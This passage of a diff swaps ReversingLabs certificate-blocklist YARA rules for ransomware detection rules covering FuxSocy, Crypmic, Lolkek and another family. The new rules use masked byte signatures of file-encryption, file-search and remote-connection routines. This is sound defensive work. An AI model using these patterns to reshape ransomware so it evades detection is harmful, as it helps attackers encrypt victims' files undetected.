+            ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 68
+            ?? ?? ?? ?? 53 FF 75 ?? FF D7 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 FF 75 ?? FF 15 ??
+            ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3
+        }
+		$encrypt_files_p1 = {
+            56 57 6A ?? BE ?? ?? ?? ?? 5F E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 8D 45 ?? 50 56 E8 ?? ??
+            ?? ?? 83 C4 ?? 83 C6 ?? 4F 75 ?? 33 F6 39 75 ?? 74 ?? 8D 45 ?? 50 A1 ?? ?? ?? ?? 0F
+            B7 88 ?? ?? ?? ?? 56 56 51 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 59 89 4D
+            ?? 33 C0 8A 90 ?? ?? ?? ?? 88 90 ?? ?? ?? ?? 3B C6 75 ?? 33 C0 40 3B C1 72 ?? 68 ??
+            ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 5F 5E C9 C3 56 FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15
+        }
+		$encrypt_files_p2 = {
+            53 56 57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 33 DB
+            53 53 8D 44 24 ?? 50 89 5C 24 ?? FF D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 53 53 8D 44
+            24 ?? 50 FF D6 85 C0 75 ?? 89 5C 24 ?? 39 5C 24 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 0F B6 80 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
+            74 24 ?? E8 ?? ?? ?? ?? 59 53 FF 74 24 ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 53 53
+            53 53 C6 05 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 88 1D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 59 33 C0 88 98 ?? ?? ?? ?? 3B C3 75 ?? 33 C0 40 83 F8 ?? 72 ?? 6A ?? 5E
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4
+            ?? 6A ?? 53 53 8D 44 24 ?? 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 4E 75 ?? 8B 3D ??
+            ?? ?? ?? 81 C7 ?? ?? ?? ?? 6A ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85 C0 75 ?? 57 E8
+            ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3
+        }
+		$http_remote_connection = {
+            53 56 57 FF 75 ?? 33 FF 8D 75 ?? 89 7D ?? E8 ?? ?? ?? ?? 59 89 7D ?? 57 57 57 FF 75
+            ?? 57 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 57 57 6A ?? 57 57 FF 75 ??
+            FF 75 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 33 C9 80 7D ?? ?? 57
+            0F 95 C1 B8 ?? ?? ?? ?? 49 23 C8 03 C8 51 57 57 57 FF 75 ?? 68 ?? ?? ?? ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 8B D8 3B DF 74 ?? 57 57 57 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33
+            F6 57 57 8D 45 ?? 50 53 89 7D ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 C6 3B C7
+            75 ?? 89 7D ?? EB ?? 50 39 7D ?? 75 ?? E8 ?? ?? ?? ?? 59 EB ?? FF 75 ?? 6A ?? FF 15
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 75 ?? 8B 45 ?? 03 C6 50 53
+            FF 15 ?? ?? ?? ?? 03 75 ?? 39 7D ?? 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 39 7D ?? 75 ?? 33 C0 40 39 45 ?? 74 ?? 89 45 ?? E9
+            ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 5F 5E 5B
+            C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STA-R TOV" and pe.signatures [ i ] . serial == "0d:53:69:06:31:dd:18:6c:56:be:90:26:eb:93:1a:e2" and 1592190240 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $search_files and $http_remote_connection and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_32119925A6Ce4710Aecc4006C28E749F : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Fuxsocy : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects FuxSocy ransomware."
 		author = "ReversingLabs"
-		id = "cfd51cb8-bd04-5ede-a73e-e924815a01f0"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "f4a45469-9d51-523f-8238-c7044f353cf6"
+		date = "2021-03-01"
+		modified = "2021-03-01"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4852-L4868"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ca812cdfbb7ca984fae1e16159eb0eeb1e65767fcc6aa07eeb84966853146f9d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.FuxSocy.yara#L1-L114"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8b3c04eb5d60fcc82e47cb8e78da0a98642666546d6799baef24b56926e3aceb"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "FuxSocy"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_1 = {
+            83 EC ?? 53 55 57 89 54 24 ?? 8B 54 24 ?? 51 33 DB E8 ?? ?? ?? ?? 8B E8 59 85 ED 0F
+            84 ?? ?? ?? ?? 8B 44 24 ?? 89 5C 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B CB E9
+            ?? ?? ?? ?? 53 53 FF 74 24 ?? 41 FF 74 24 ?? BF ?? ?? ?? ?? FF 74 24 ?? 3B C7 0F 42
+            F8 2B C7 89 4C 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 53 8D 44 24 ?? 50 57 FF 74 24 ??
+            FF 74 24 ?? FF 15 ?? ?? ?? ?? 57 FF 74 24 ?? 8D 54 24 ?? 8D 4C 24 ?? E8 ?? ?? ?? ??
+            59 59 57 8D 44 24 ?? 50 FF 74 24 ?? 33 C0 39 44 24 ?? 53 0F 94 C0 89 7C 24 ?? 50 53
+            55 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 53 FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 15 ??
+            ?? ?? ?? 53 8D 44 24 ?? 50 57 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 01 7C 24 ??
+            8B 4C 24 ?? 11 5C 24 ?? F6 C1 ?? 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B 44 24
+            ?? 85 C0 0F 85 ?? ?? ?? ?? EB ?? 88 5C 24 ?? FF 74 24 ?? 8B 54 24 ?? 8B 4C 24 ?? E8
+            ?? ?? ?? ?? 59 8B 4C 24 ?? 55 89 41 ?? FF 15 ?? ?? ?? ?? 8A 5C 24 ?? 5F 5D 8A C3 5B
+            83 C4 ?? C3
+        }
+		$encrypt_files_2 = {
+            83 EC ?? 53 55 56 8B 74 24 ?? 8B C1 8B 36 57 89 54 24 ?? 89 44 24 ?? E8 ?? ?? ?? ??
+            8B F8 33 D2 8D 5F ?? 8B C6 F7 F3 33 C9 85 D2 0F 95 C1 89 54 24 ?? 33 D2 03 C8 89 4C
+            24 ?? 0F AF CF 89 4C 24 ?? E8 ?? ?? ?? ?? 8B E8 89 6C 24 ?? 85 ED 0F 84 ?? ?? ?? ??
+            33 D2 8B CF E8 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83 64 24 ?? ??
+            48 89 6C 24 ?? 89 44 24 ?? 74 ?? 53 FF 74 24 ?? 89 5C 24 ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 44 24 ?? 57 50 56 33 C0 50 50 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 33 C9 85 FF 74 ?? 8B 54 24 ?? 8D 6E ?? 03 EF 8A 45 ?? 4D 88 04 11 41 3B CF
+            72 ?? 8B 6C 24 ?? 8B 44 24 ?? 03 44 24 ?? 01 5C 24 ?? 89 44 24 ?? 8B 44 24 ?? 40 89
+            44 24 ?? 3B 44 24 ?? 72 ?? 8B 44 24 ?? 85 C0 0F 45 D8 53 FF 74 24 ?? 89 5C 24 ?? 56
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 57 50 56 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF 15 ??
+            ?? ?? ?? 8B D8 F7 DB 1A DB 80 E3 ?? 33 C9 85 FF 74 ?? 8B 6C 24 ?? 8D 56 ?? 03 D7 8A
+            02 4A 88 04 29 41 3B CF 72 ?? 8B 6C 24 ?? 8B CE E8 ?? ?? ?? ?? 84 DB 75 ?? 8B CD E8
+            ?? ?? ?? ?? 33 ED EB ?? 32 DB EB ?? 8B 4C 24 ?? 8B 44 24 ?? 89 01 5F 5E 8B C5 5D 5B
+            83 C4 ?? C3
+        }
+		$find_files_1 = {
+            81 EC ?? ?? ?? ?? 53 56 57 8B BC 24 ?? ?? ?? ?? 8B F2 89 74 24 ?? 8B D9 85 FF 0F 84
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B D7 C1 E2 ?? 8B
+            CE E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0
+            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D3 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0
+            0F 84 ?? ?? ?? ?? 55 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B E8
+            83 FD ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 44
+            24 ?? 83 E0 ?? 74 ?? F6 84 24 ?? ?? ?? ?? ?? 75 ?? 85 C0 75 ?? F6 84 24 ?? ?? ?? ??
+            ?? 74 ?? 33 F6 85 FF 74 ?? 8B 44 24 ?? FF 34 B0 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85
+            C0 75 ?? 46 3B F7 72 ?? EB ?? FF B4 24 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 94 24 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 74 ?? FF B4 24 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 8B 74 24 ?? F6 44 24 ?? ?? 74 ?? F6 84 24 ?? ?? ?? ?? ?? 74
+            ?? 8D 44 24 ?? 50 8B D3 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0 74 ?? 83 BC 24
+            ?? ?? ?? ?? ?? 74 ?? FF B4 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B
+            D6 FF B4 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ??
+            ?? FF B4 24 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 55 FF 15 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? EB ?? 83 64 24 ?? ?? 55 FF 15 ?? ?? ?? ?? 5D 5F 5E 5B 81
+            C4 ?? ?? ?? ?? C3
+        }
+		$find_files_2 = {
+            81 EC ?? ?? ?? ?? 8D 44 24 ?? 53 55 56 68 ?? ?? ?? ?? 50 8B D9 FF 15 ?? ?? ?? ?? 8B
+            F0 85 F6 0F 84 ?? ?? ?? ?? 8D 6C 24 ?? 8D 6C 75 ?? 33 C0 66 89 44 74 ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 59 E8 ?? ?? ?? ?? 83 C0 ?? 6A ?? 59 66 89
+            45 ?? E8 ?? ?? ?? ?? 83 C0 ?? 66 89 44 74 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50
+            FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 84 C0 74 ?? 8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 83 64 24 ?? ?? 8D 44
+            24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 53
+            FF 15 ?? ?? ?? ?? 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
+        }
+		$find_files_3 = {
+            81 EC ?? ?? ?? ?? 53 55 56 8B D9 57 8B FA 85 DB 74 ?? 33 D2 E8 ?? ?? ?? ?? 8B F0 85
+            F6 0F 84 ?? ?? ?? ?? 57 56 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            83 C4 ?? 8B CE E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 C6 43 ?? ?? FF 15 ?? ?? ?? ??
+            0D ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? 0D ?? ?? ?? ?? 50 57 FF
+            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0 0F
+            84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 80 7E ?? ?? 75 ?? 8B 15 ?? ?? ?? ?? 8D 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 ?? ?? ?? ?? 83 64 24 ?? ?? 6A ?? FF 35 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 84 C0
+            0F 85 ?? ?? ?? ?? F7 44 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 56
+            57 FF 15 ?? ?? ?? ?? 50 8B D7 8B CB E8 ?? ?? ?? ?? 59 59 89 44 24 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? F6 44
+            24 ?? ?? 74 ?? 80 7E ?? ?? 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 56 FF B4 24 ??
+            ?? ?? ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 59 59 EB ?? 80 7E ?? ?? 74 ?? 85 DB 74 ?? 83 7C
+            24 ?? ?? 7C ?? 7F ?? 81 7C 24 ?? ?? ?? ?? ?? 72 ?? 80 3E ?? 74 ?? 6A ?? 8D 44 24 ??
+            50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 44 24 ?? 50 FF 74 24 ?? FF 94 24 ?? ?? ?? ??
+            83 C4 ?? 85 C0 74 ?? 8D 44 24 ?? 50 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55
+            FF 15 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maxiol" and pe.signatures [ i ] . serial == "32:11:99:25:a6:ce:47:10:ae:cc:40:06:c2:8e:74:9f" and 1592438400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_* ) ) and ( all of ( $encrypt_files_* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_2C90Eaf4De3Afc03Ba924C719435C2A3 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Crypmic : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Crypmic ransomware."
 		author = "ReversingLabs"
-		id = "06edc1a3-65b1-5a69-ab6b-4ffc3963513c"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "0d5c2141-c0ca-53c8-91fd-ec2d5f163df2"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4870-L4888"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5bb78a5e39f9d023cf63edabdc83d4965fc79f6f04f9fea9bcf2a53223fbd4ca"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Crypmic.yara#L1-L56"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ee97c4d35cee68e080a4e9e0a21ecd3698da638463881a58f5daaf906ef86f75"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Crypmic"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AntiFIX s.r.o." and ( pe.signatures [ i ] . serial == "00:2c:90:ea:f4:de:3a:fc:03:ba:92:4c:71:94:35:c2:a3" or pe.signatures [ i ] . serial == "2c:90:ea:f4:de:3a:fc:03:ba:92:4c:71:94:35:c2:a3" ) and 1586293430 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_Aff762E907F0644E76Ed8A7485Fb12A1 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "3b3bbbdd-9c2d-5c80-a121-3e3ad13e9ac6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4890-L4908"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ad05389e0eb30cb894b03842d213b8c956f66357a913c73d8d8b79f8336bf980"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$search_and_encrypt_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 B8 ?? ?? ?? ?? 57 8B F9 89 7D ?? C7 45 ?? ?? ?? ??
+            ?? 89 45 ?? 8D 50 ?? 68 ?? ?? ?? ?? 6A ?? FF 77 ?? 66 89 85 ?? ?? ?? ?? 8B 47 ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D0 66 8B 95 ?? ?? ?? ?? 33 F6 33
+            C9 89 45 ?? 66 3B F2 74 ?? 0F B7 D2 41 66 89 14 06 8D 34 09 33 DB 0F B7 94 35 ?? ??
+            ?? ?? 66 3B DA 75 ?? BA ?? ?? ?? ?? 66 89 14 48 8D 1C 48 8D 8D ?? ?? ?? ?? 51 C7 43
+            ?? ?? ?? ?? ?? 50 8B 47 ?? FF D0 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ??
+            ?? 74 ?? 66 8B 8D ?? ?? ?? ?? 66 83 F9 ?? 74 ?? 66 83 BD ?? ?? ?? ?? ?? 74 ?? 33 D2
+            33 C0 66 3B D1 74 ?? 0F B7 C9 8B FF 40 66 89 4C 1A ?? 8D 14 00 C7 45 ?? ?? ?? ?? ??
+            0F B7 8C 15 ?? ?? ?? ?? 66 39 4D ?? 75 ?? 8B 55 ?? 33 C9 66 89 4C 43 ?? 68 ?? ?? ??
+            ?? 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 01 45 ?? 8D 85 ?? ?? ?? ?? 50 8B 47 ?? 56 FF D0 85
+            C0 75 ?? 8B 47 ?? 56 FF D0 8D 85 ?? ?? ?? ?? 50 FF 75 ?? C7 43 ?? ?? ?? ?? ?? 8B 47
+        }
+		$search_and_encrypt_2 = {
+            33 F6 89 75 ?? FF D0 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? 8D 9B ?? ?? ?? ??
+            F6 85 ?? ?? ?? ?? ?? 75 ?? 66 8B BD ?? ?? ?? ?? 33 F6 8B 8E ?? ?? ?? ?? 8D 95 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 83 FF ?? 75 ??
+            EB ?? 8D 9B ?? ?? ?? ?? 66 8B 48 ?? 83 C0 ?? 83 C2 ?? 66 3B 0A 74 ?? 66 83 38 ?? 0F
+            85 ?? ?? ?? ?? 66 83 3A ?? 0F 85 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 72 ?? 8B 7D
+            ?? 8B 75 ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 51 50 8B 47 ?? FF D0 85 C0 8B 45 ?? 0F 85 ??
+            ?? ?? ?? 50 8B 47 ?? FF D0 85 F6 74 ?? 8B 55 ?? 33 C0 8B CF 66 89 43 ?? E8 ?? ?? ??
+            ?? FF 75 ?? 8B 47 ?? 6A ?? FF 77 ?? FF D0 8B 45 ?? 8B 5D ?? 03 C6 03 D8 8B 45 ?? 40
+            89 5D ?? 89 45 ?? BA ?? ?? ?? ?? 83 F8 ?? 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 8B 47 ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B CF E8
+            ?? ?? ?? ?? 83 C4 ?? 03 C3 5F 5E 5B 8B E5 5D C3 33 C9 33 C0 66 3B CF 74 ?? 0F B7 CF
+            33 D2 8D 9B ?? ?? ?? ?? 40 66 89 4C 1A ?? 8D 14 00 33 F6 0F B7 8C 15 ?? ?? ?? ?? 66
+            3B F1 75 ?? 8B 75 ?? FF 75 ?? 8B 7D ?? 33 C9 46 57 66 89 4C 43 ?? 89 75 ?? E8 ?? ??
+            ?? ?? E9
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lets Start SP Z O O" and ( pe.signatures [ i ] . serial == "00:af:f7:62:e9:07:f0:64:4e:76:ed:8a:74:85:fb:12:a1" or pe.signatures [ i ] . serial == "af:f7:62:e9:07:f0:64:4e:76:ed:8a:74:85:fb:12:a1" ) and 1594882330 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $search_and_encrypt_* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_D8530214Ca0F512946496B5164C61201 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Lolkek : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Lolkek ransomware."
 		author = "ReversingLabs"
-		id = "0125a67a-d5e7-5c93-a58c-cacb6d8fa60b"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "441badd6-3708-5f74-90f3-4d3a0fc45aff"
+		date = "2020-10-23"
+		modified = "2020-10-23"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4910-L4928"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "377962915586c9f5a5737c24b698c96efc2e819e52ee16109c405f9af2d57e7f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Lolkek.yara#L1-L106"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d18545b25a33bba1a6e01ab37768bd4f15fb125dcb8cbe7909d9a8bbe08e63fa"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Lolkek"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DJ ONLINE MARKETING LIMITED" and ( pe.signatures [ i ] . serial == "00:d8:53:02:14:ca:0f:51:29:46:49:6b:51:64:c6:12:01" or pe.signatures [ i ] . serial == "d8:53:02:14:ca:0f:51:29:46:49:6b:51:64:c6:12:01" ) and 1595485920 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_661Ba8F3C9D1B348413484E9A49502F7 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "a0c501c9-a856-55b6-b845-aeab4db5ab51"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4930-L4948"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4840b311c1e2c0ae14bb2cf6fa8d96ab1a434ceac861db540697f3aed1a6833f"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files = {
+            57 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? B9 ?? ?? ?? ?? FF 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 3C 85 ?? ?? ?? ?? 40 99
